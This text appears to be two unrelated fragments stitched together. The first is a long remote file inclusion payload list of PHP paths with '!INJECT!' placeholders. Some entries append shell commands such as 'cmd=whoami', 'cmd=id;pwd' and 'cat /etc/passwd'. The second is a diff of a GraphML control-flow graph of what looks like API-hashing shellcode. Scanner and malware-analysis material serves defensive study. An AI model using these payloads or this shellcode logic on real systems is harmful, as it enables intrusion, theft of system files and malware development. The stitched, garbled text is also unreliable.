/supasite/admin_users.php?supa[db_path]=!INJECT!
|
||||
/supasite/admin_utilities.php?supa[db_path]=!INJECT!
|
||||
/supasite/backend_site.php?supa[include_path]=!INJECT!
|
||||
/supasite/common_functions.php?supa[db_path]=!INJECT!
|
||||
/supasite/site_comment.php?supa[db_path]=!INJECT!
|
||||
/supasite/site_news.php?supa[db_path]=!INJECT!
|
||||
/support/include/open_form.php?include_dir=!INJECT!?cmd=pwd
|
||||
/support/index.php?main=!INJECT!
|
||||
/surveys/survey.inc.php?path=!INJECT!
|
||||
/sw/lib_comment/comment.php?doc_directory=!INJECT!?
|
||||
/sw/lib_find/find.php?doc_directory=!INJECT!?
|
||||
/sw/lib_session/session.php?doc_directory=!INJECT!?
|
||||
/sw/lib_up_file/file.php?doc_directory=!INJECT!?
|
||||
/sw/lib_up_file/find_file.php?doc_directory=!INJECT!?
|
||||
/sw/lib_user/find_user.php?doc_directory=!INJECT!?
|
||||
/sw/lib_user/user.php?doc_directory=!INJECT!?
|
||||
/sys/code/box.inc.php?config["sipssys"]=!INJECT!
|
||||
/system/ImageImageMagick.php?glConf[path_system]=!INJECT!?
|
||||
/system/_b/contentFiles/gBIndex.php?gBRootPath=!INJECT!?
|
||||
/system/admin/include/item_main.php?GLOBALS=!INJECT!
|
||||
/system/admin/include/upload_form.php?GLOBALS=!INJECT!
|
||||
/system/command/admin.cmd.php?GLOBALS=!INJECT!
|
||||
/system/command/download.cmd.php?GLOBALS=!INJECT!
|
||||
/system/funcs/xkurl.php?PEARPATH=!INJECT!
|
||||
/system/includes/pageheaderdefault.inc.php?_sysSessionPath=!INJECT!
|
||||
/system/login.php?site_path=!INJECT!
|
||||
/tagit2b/tagmin/delTagUser.php?configpath=!INJECT!?
|
||||
/tags.php?BBCodeFile=!INJECT!
|
||||
/taxonservice.php?dir=!INJECT!?
|
||||
/teatro/pub/pub08_comments.php?basePath=!INJECT!
|
||||
/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=!INJECT!?
|
||||
/template.php?actionsPage=!INJECT!?
|
||||
/template.php?blog_theme=!INJECT!
|
||||
/template.php?pagina=!INJECT!
|
||||
/template/Noir/index.php?site_path=!INJECT!
|
||||
/template/Vert/index.php?pageAll=!INJECT!
|
||||
/template/Vert/index.php?site_path=!INJECT!
|
||||
/template/barnraiser_01/p_new_password.tpl.php?templatePath=!INJECT!
|
||||
/template/default/footer.php?ROOT_PATH=!INJECT!?cmd=ls
|
||||
/template/default/test/header.php?ROOT_PATH=!INJECT!?cmd=ls
|
||||
/template/gwb/user_bottom.php?config[template_path]=!INJECT!
|
||||
/template/purpletech/base_include.php?page=!INJECT!?
|
||||
/template/rwb/user_bottom.php?config[template_path]=!INJECT!
|
||||
/template_csv.php?rInfo[content]=!INJECT!
|
||||
/templates/2blue/bodyTemplate.php?serverPath=!INJECT!?
|
||||
/templates/Official/part_userprofile.php?template_path=!INJECT!
|
||||
/templates/barrel/template.tpl.php?renderer=!INJECT!
|
||||
/templates/barrel/template.tpl.php?renderer=!INJECT!?
|
||||
/templates/barry/template.tpl.php?renderer=!INJECT!
|
||||
/templates/be2004-2/index.php?mosConfig_absolute_path=!INJECT!
|
||||
/templates/datumVonDatumBis.inc.php?root=!INJECT!
|
||||
/templates/default/header.inc.php?menu=!INJECT!
|
||||
/templates/default/index_logged.php?main_loaded=1&cur_module=!INJECT!
|
||||
/templates/default/tpl_message.php?right_file=!INJECT!
|
||||
/templates/footer.inc.php?root=!INJECT!
|
||||
/templates/header.inc.php?root=!INJECT!
|
||||
/templates/mylook/template.tpl.php?renderer=!INJECT!
|
||||
/templates/oerdec/template.tpl.php?renderer=!INJECT!
|
||||
/templates/pb/language/lang_nl.php?temppath=!INJECT!
|
||||
/templates/penguin/template.tpl.php?renderer=!INJECT!
|
||||
/templates/sidebar/template.tpl.php?renderer=!INJECT!
|
||||
/templates/slashdot/template.tpl.php?renderer=!INJECT!
|
||||
/templates/stylesheets.php?root=!INJECT!
|
||||
/templates/text-only/template.tpl.php?renderer=!INJECT!
|
||||
/templates/tmpl_dfl/scripts/index.php?dir[inc]=!INJECT!
|
||||
/theme/breadcrumb.php?rootBase=!INJECT!?
|
||||
/theme/default.php?root=!INJECT!
|
||||
/theme/format.php?_page_content=!INJECT!?
|
||||
/theme/format.php?_page_css=!INJECT!?
|
||||
/theme/frames1.php?root=!INJECT!
|
||||
/theme/frames1_center.php?root=!INJECT!
|
||||
/theme/frames1_left.php?root=!INJECT!
|
||||
/theme/frames1_top.php?root=!INJECT!
|
||||
/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=!INJECT!
|
||||
/theme/settings.php?pfad_z=!INJECT!
|
||||
/theme/test1.php?root=!INJECT!
|
||||
/theme/test2.php?root=!INJECT!
|
||||
/theme/test3.php?root=!INJECT!
|
||||
/theme/test4.php?root=!INJECT!
|
||||
/theme/test5.php?root=!INJECT!
|
||||
/theme/test6.php?root=!INJECT!
|
||||
/themes.php?GLOBALS[theme_path]=!INJECT!?
|
||||
/themes/blackorange.php?root=!INJECT!
|
||||
/themes/container.php?theme_directory=!INJECT!%00
|
||||
/themes/default/layouts/standard.php?page_include=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
|
||||
/themes/default/preview_post_completo.php?dir=!INJECT!
|
||||
/themes/header.php?theme_directory=!INJECT!%00
|
||||
/themes/ubb/login.php?theme=!INJECT!
|
||||
/themes/ubb/login.php?theme=!INJECT!?
|
||||
/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=!INJECT!
|
||||
/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=!INJECT!
|
||||
/timedifference.php?la=!INJECT!
|
||||
/toolbar.loudmouth.php?mainframe=!INJECT!
|
||||
/tools/update_translations.php?_SESSION[path]=!INJECT!?
|
||||
/top.php?laypath=!INJECT!
|
||||
/toplist.php?f=toplist_top10&phpbb_root_path=!INJECT!
|
||||
/topsites/index.php?page=!INJECT!?&
|
||||
/towels-0.1/src/scripture.php?pageHeaderFile=!INJECT!
|
||||
/track.php?path=!INJECT!
|
||||
/tsep/include/colorswitch.php?tsep_config[absPath]=!INJECT!?
|
||||
/ttCMS_path/lib/db/ez_sql.php?lib_path=!INJECT!
|
||||
/twebs/modules/misc/usermods.php?ROOT=!INJECT!
|
||||
/ubbt.inc.php?GLOBALS[thispath]=!INJECT!?
|
||||
/unavailable.php?bibtexrootrel=!INJECT!?
|
||||
/unsubs.php?scdir=!INJECT!
|
||||
/up.php?my[root]=!INJECT!
|
||||
/upload.php?save_path=!INJECT!?
|
||||
/upload/admin/frontpage_right.php?loadadminpage=!INJECT!?
|
||||
/upload/top.php?maindir=!INJECT!?
|
||||
/upload/xax/admin/modules/install_module.php?level=!INJECT!?
|
||||
/upload/xax/admin/patch/index.php?level=!INJECT!?
|
||||
/upload/xax/ossigeno/admin/install_module.php?level=!INJECT!?
|
||||
/upload/xax/ossigeno/admin/uninstall_module.php?level=!INJECT!?
|
||||
/upload_local.php?target=!INJECT!?
|
||||
/upload_multi.php?target=!INJECT!?
|
||||
/urlinn_includes/config.php?dir_ws=!INJECT!?
|
||||
/user.php?caselist[bad_file.txt][path]=!INJECT!&command=cat%20/etc/passwd
|
||||
/user_language.php?INDM=r3d.w0rm&language_dir=!INJECT!?
|
||||
/user_new_2.php?home=!INJECT!
|
||||
/usr/extensions/get_calendar.inc.php?root_path=!INJECT!
|
||||
/usr/extensions/get_infochannel.inc.php?root_path=!INJECT!?cmd=id;pwd
|
||||
/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=!INJECT!
|
||||
/utilitaires/gestion_sondage.php?repertoire_visiteur=!INJECT!
|
||||
/utils/class_HTTPRetriever.php?libcurlemuinc=!INJECT!
|
||||
/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=!INJECT!
|
||||
/vCard/admin/define.inc.php?match=!INJECT!?&cmd=id
|
||||
/vb/includes/functions.php?classfile=!INJECT!
|
||||
/vb/includes/functions_cron.php?nextitem=!INJECT!
|
||||
/vb/includes/functions_forumdisplay.php?specialtemplates=!INJECT!
|
||||
/vbgsitemap/vbgsitemap-config.php?base=!INJECT!
|
||||
/vbgsitemap/vbgsitemap-vbseo.php?base=!INJECT!
|
||||
/vedit/editor/edit_htmlarea.php?highlighter=!INJECT!?
|
||||
/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=!INJECT!?
|
||||
/view.php?ariadne=!INJECT!?
|
||||
/view.php?id=!INJECT!
|
||||
/view_func.php?i=!INJECT!&l=testfile.txt?
|
||||
/views/print/printbar.php?views_path=!INJECT!
|
||||
/visible_count_inc.php?statitpath=!INJECT!
|
||||
/visitor.php?_SERVER[DOCUMENT_ROOT]=!INJECT!??
|
||||
/volume.php?config[public_dir]=!INJECT!?
|
||||
/vote.php?Madoa=!INJECT!?
|
||||
/votebox.php?VoteBoxPath=!INJECT!
|
||||
/vp/configure.php?phpbb_root_path=!INJECT!?
|
||||
/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
|
||||
/w-agora_path/add_user.php?bn_dir_default=!INJECT!?
|
||||
/w-agora_path/create_forum.php?bn_dir_default=!INJECT!?
|
||||
/w-agora_path/create_user.php?bn_dir_default=!INJECT!?
|
||||
/w-agora_path/delete_notes.php?bn_dir_default=!INJECT!?
|
||||
/w-agora_path/delete_user.php?bn_dir_default=!INJECT!?
|
||||
/w-agora_path/edit_forum.php?bn_dir_default=!INJECT!?
|
||||
/w-agora_path/mail_users.php?bn_dir_default=!INJECT!?
|
||||
/w-agora_path/moderate_notes.php?bn_dir_default=!INJECT!?
|
||||
/w-agora_path/reorder_forums.php?bn_dir_default=!INJECT!?
|
||||
/wamp_dir/setup/yesno.phtml?no_url=!INJECT!?
|
||||
/wapchat/src/eng.adCreate.php?sysFileDir=!INJECT!
|
||||
/wapchat/src/eng.adCreateSave.php?sysFileDir=!INJECT!
|
||||
/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=!INJECT!
|
||||
/wapchat/src/eng.createRoom.php?sysFileDir=!INJECT!
|
||||
/wapchat/src/eng.forward.php?sysFileDir=!INJECT!
|
||||
/wapchat/src/eng.pageLogout.php?sysFileDir=!INJECT!
|
||||
/wapchat/src/eng.resultMember.php?sysFileDir=!INJECT!
|
||||
/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=!INJECT!
|
||||
/wapchat/src/eng.saveNewRoom.php?sysFileDir=!INJECT!
|
||||
/wapchat/src/eng.searchMember.php?sysFileDir=!INJECT!
|
||||
/wapchat/src/eng.writeMsg.php?sysFileDir=!INJECT!
|
||||
/war.php?vwar_root=!INJECT!
|
||||
/warn.php?file=!INJECT!
|
||||
/watermark.php?GALLERY_BASEDIR=!INJECT!
|
||||
/wbxml/WBXML/Decoder.php?base_dir=!INJECT!
|
||||
/wbxml/WBXML/Encoder.php?base_dir=!INJECT!
|
||||
/web/Administration/Includes/configureText.php?path_prefix=!INJECT!
|
||||
/web/Administration/Includes/contentHome.php?path_prefix=!INJECT!
|
||||
/web/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
|
||||
/web/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
|
||||
/web/Administration/Includes/userHome.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path!INJECT!
|
||||
/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix!INJECT!
|
||||
/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path!INJECT!
|
||||
/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path!INJECT!
|
||||
/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path!INJECT!
|
||||
/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path!INJECT!
|
||||
/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
|
||||
/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path!INJECT!
|
||||
/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
|
||||
/web/Flickrclient.php?path_prefix=!INJECT!
|
||||
/web/help.php?LIBSDIR=!INJECT!
|
||||
/web/includes/blogger.php?path_prefix=!INJECT!
|
||||
/web/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
|
||||
/web/includes/functions/html_generate.php?path_prefix=!INJECT!
|
||||
/web/includes/functions/validations.php?path_prefix=!INJECT!
|
||||
/web/index.php?LIBSDIR=!INJECT!
|
||||
/web/lib/xml/oai/ListRecords.php?xml_dir=!INJECT!
|
||||
/web/login.php?LIBSDIR=!INJECT!
|
||||
/web/logout.php?LIBSDIR=!INJECT!
|
||||
/web/lom.php?ETCDIR=!INJECT!
|
||||
/web/network_module_selector.php?path_prefix=!INJECT!
|
||||
/web/submit_abuse.php?path_prefix=!INJECT!
|
||||
/web/submit_comment.php?path_prefix=!INJECT!
|
||||
/webavis/class/class.php?root=!INJECT!?
|
||||
/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
|
||||
/webnews/template.php?content_page=!INJECT!?
|
||||
/webroot/css.php?CONFIGS=!INJECT!
|
||||
/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=!INJECT!
|
||||
/webyep-system/programm/webyep.php?webyep_sIncludePath=!INJECT!?
|
||||
/window.php?action=!INJECT!
|
||||
/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=!INJECT!?
|
||||
/work/index.php?g_include=!INJECT!
|
||||
/work/module/forum/forum.php?g_include=!INJECT!
|
||||
/worldpay_notify.php?mosConfig_absolute_path=!INJECT!
|
||||
/wp-cache-phase1.php?plugin=!INJECT!
|
||||
/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
|
||||
/wp-content/plugins/myflash/myflash-button.php?wpPATH=!INJECT!
|
||||
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
|
||||
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=!INJECT!
|
||||
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=!INJECT!?
|
||||
/wsk/wsk.php?wsk=!INJECT!
|
||||
/xarg_corner.php?xarg=!INJECT!?
|
||||
/xarg_corner_bottom.php?xarg=!INJECT!?
|
||||
/xarg_corner_top.php?xarg=!INJECT!?
|
||||
/xoopsgallery/init_basic.php?GALLERY_BASEDIR=!INJECT!?&2093085906=1&995617320=2
|
||||
/xt_counter.php?server_base_dir=!INJECT!
|
||||
/yabbse/Sources/Packages.php?sourcedir=!INJECT!
|
||||
/yacs/scripts/update_trailer.php?context[path_to_root]=!INJECT!?
|
||||
/yrch/plugins/metasearch/plug.inc.php?path=!INJECT!
|
||||
/ytb/cuenta/cuerpo.php?base_archivo=!INJECT!
|
||||
/zipndownload.php?PP_PATH=!INJECT!?
|
||||
/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=!INJECT!?
|
||||
|
||||
@@ -90,350 +90,343 @@
|
||||
<node id="block.0x1017:instruction.0x101b">
|
||||
<data key="address">0x101b</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">480fb74a4a</data>
|
||||
<data key="instruction.source">movzx rcx, word ptr [rdx + 0x4a]</data>
|
||||
<data key="instruction.hex">480fb74a48</data>
|
||||
<data key="instruction.source">movzx rcx, word ptr [rdx + 0x48]</data>
|
||||
</node>
|
||||
<node id="block.0x1017:instruction.0x1020">
|
||||
<data key="address">0x1020</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4d31c9</data>
|
||||
<data key="instruction.source">xor r9, r9</data>
|
||||
<data key="instruction.hex">41b900000000</data>
|
||||
<data key="instruction.source">mov r9d, 0</data>
|
||||
</node>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1023">
|
||||
<data key="address">0x1023</data>
|
||||
<node id="block.0x1026">
|
||||
<data key="address">0x1026</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1023</data>
|
||||
<data key="address">0x1026</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1023:instruction.0x1023">
|
||||
<data key="address">0x1023</data>
|
||||
<node id="block.0x1026:instruction.0x1026">
|
||||
<data key="address">0x1026</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4831c0</data>
|
||||
<data key="instruction.source">xor rax, rax</data>
|
||||
</node>
|
||||
<node id="block.0x1023:instruction.0x1026">
|
||||
<data key="address">0x1026</data>
|
||||
<node id="block.0x1026:instruction.0x1029">
|
||||
<data key="address">0x1029</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">ac</data>
|
||||
<data key="instruction.source">lodsb al, byte ptr [rsi]</data>
|
||||
</node>
|
||||
<node id="block.0x1023:instruction.0x1027">
|
||||
<data key="address">0x1027</data>
|
||||
<node id="block.0x1026:instruction.0x102a">
|
||||
<data key="address">0x102a</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">3c61</data>
|
||||
<data key="instruction.source">cmp al, 0x61</data>
|
||||
</node>
|
||||
<node id="block.0x1023:instruction.0x1029">
|
||||
<data key="address">0x1029</data>
|
||||
<node id="block.0x1026:instruction.0x102c">
|
||||
<data key="address">0x102c</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">7c02</data>
|
||||
<data key="instruction.source">jl 0x102d</data>
|
||||
<data key="instruction.source">jl 0x1030</data>
|
||||
</node>
|
||||
<edge source="block.0x1023:instruction.0x1023" target="block.0x1023:instruction.0x1026"/>
|
||||
<edge source="block.0x1023:instruction.0x1026" target="block.0x1023:instruction.0x1027"/>
|
||||
<edge source="block.0x1023:instruction.0x1027" target="block.0x1023:instruction.0x1029"/>
|
||||
<edge source="block.0x1026:instruction.0x1026" target="block.0x1026:instruction.0x1029"/>
|
||||
<edge source="block.0x1026:instruction.0x1029" target="block.0x1026:instruction.0x102a"/>
|
||||
<edge source="block.0x1026:instruction.0x102a" target="block.0x1026:instruction.0x102c"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x102b">
|
||||
<data key="address">0x102b</data>
|
||||
<node id="block.0x102e">
|
||||
<data key="address">0x102e</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x102b</data>
|
||||
<data key="address">0x102e</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x102b:instruction.0x102b">
|
||||
<data key="address">0x102b</data>
|
||||
<node id="block.0x102e:instruction.0x102e">
|
||||
<data key="address">0x102e</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">2c20</data>
|
||||
<data key="instruction.source">sub al, 0x20</data>
|
||||
</node>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x102d">
|
||||
<data key="address">0x102d</data>
|
||||
<node id="block.0x1030">
|
||||
<data key="address">0x1030</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x102d</data>
|
||||
<data key="address">0x1030</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x102d:instruction.0x102d">
|
||||
<data key="address">0x102d</data>
|
||||
<node id="block.0x1030:instruction.0x1030">
|
||||
<data key="address">0x1030</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">41c1c90d</data>
|
||||
<data key="instruction.source">ror r9d, 0xd</data>
|
||||
</node>
|
||||
<node id="block.0x102d:instruction.0x1031">
|
||||
<data key="address">0x1031</data>
|
||||
<node id="block.0x1030:instruction.0x1034">
|
||||
<data key="address">0x1034</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4101c1</data>
|
||||
<data key="instruction.source">add r9d, eax</data>
|
||||
</node>
|
||||
<node id="block.0x102d:instruction.0x1034">
|
||||
<data key="address">0x1034</data>
|
||||
<node id="block.0x1030:instruction.0x1037">
|
||||
<data key="address">0x1037</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">e2ed</data>
|
||||
<data key="instruction.source">loop 0x1023</data>
|
||||
<data key="instruction.source">loop 0x1026</data>
|
||||
</node>
|
||||
<edge source="block.0x102d:instruction.0x102d" target="block.0x102d:instruction.0x1031"/>
|
||||
<edge source="block.0x102d:instruction.0x1031" target="block.0x102d:instruction.0x1034"/>
|
||||
<edge source="block.0x1030:instruction.0x1030" target="block.0x1030:instruction.0x1034"/>
|
||||
<edge source="block.0x1030:instruction.0x1034" target="block.0x1030:instruction.0x1037"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1036">
|
||||
<data key="address">0x1036</data>
|
||||
<node id="block.0x1039">
|
||||
<data key="address">0x1039</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1036</data>
|
||||
<data key="address">0x1039</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1036:instruction.0x1036">
|
||||
<data key="address">0x1036</data>
|
||||
<node id="block.0x1039:instruction.0x1039">
|
||||
<data key="address">0x1039</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">52</data>
|
||||
<data key="instruction.source">push rdx</data>
|
||||
</node>
|
||||
<node id="block.0x1036:instruction.0x1037">
|
||||
<data key="address">0x1037</data>
|
||||
<node id="block.0x1039:instruction.0x103a">
|
||||
<data key="address">0x103a</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4151</data>
|
||||
<data key="instruction.source">push r9</data>
|
||||
</node>
|
||||
<node id="block.0x1036:instruction.0x1039">
|
||||
<data key="address">0x1039</data>
|
||||
<node id="block.0x1039:instruction.0x103c">
|
||||
<data key="address">0x103c</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">488b5220</data>
|
||||
<data key="instruction.source">mov rdx, qword ptr [rdx + 0x20]</data>
|
||||
</node>
|
||||
<node id="block.0x1036:instruction.0x103d">
|
||||
<data key="address">0x103d</data>
|
||||
<node id="block.0x1039:instruction.0x1040">
|
||||
<data key="address">0x1040</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b423c</data>
|
||||
<data key="instruction.source">mov eax, dword ptr [rdx + 0x3c]</data>
|
||||
</node>
|
||||
<node id="block.0x1036:instruction.0x1040">
|
||||
<data key="address">0x1040</data>
|
||||
<node id="block.0x1039:instruction.0x1043">
|
||||
<data key="address">0x1043</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4801d0</data>
|
||||
<data key="instruction.source">add rax, rdx</data>
|
||||
</node>
|
||||
<node id="block.0x1036:instruction.0x1043">
|
||||
<data key="address">0x1043</data>
|
||||
<node id="block.0x1039:instruction.0x1046">
|
||||
<data key="address">0x1046</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">668178180b02</data>
|
||||
<data key="instruction.source">cmp word ptr [rax + 0x18], 0x20b</data>
|
||||
</node>
|
||||
<node id="block.0x1036:instruction.0x1049">
|
||||
<data key="address">0x1049</data>
|
||||
<node id="block.0x1039:instruction.0x104c">
|
||||
<data key="address">0x104c</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">7572</data>
|
||||
<data key="instruction.hex">756f</data>
|
||||
<data key="instruction.source">jne 0x10bd</data>
|
||||
</node>
|
||||
<edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1039"/>
|
||||
<edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1037"/>
|
||||
<edge source="block.0x1036:instruction.0x1037" target="block.0x1036:instruction.0x1049"/>
|
||||
<edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x103d"/>
|
||||
<edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x1040"/>
|
||||
<edge source="block.0x1036:instruction.0x103d" target="block.0x1036:instruction.0x1040"/>
|
||||
<edge source="block.0x1036:instruction.0x1040" target="block.0x1036:instruction.0x1043"/>
|
||||
<edge source="block.0x1036:instruction.0x1043" target="block.0x1036:instruction.0x1049"/>
|
||||
<edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103c"/>
|
||||
<edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103a"/>
|
||||
<edge source="block.0x1039:instruction.0x103a" target="block.0x1039:instruction.0x104c"/>
|
||||
<edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1040"/>
|
||||
<edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1043"/>
|
||||
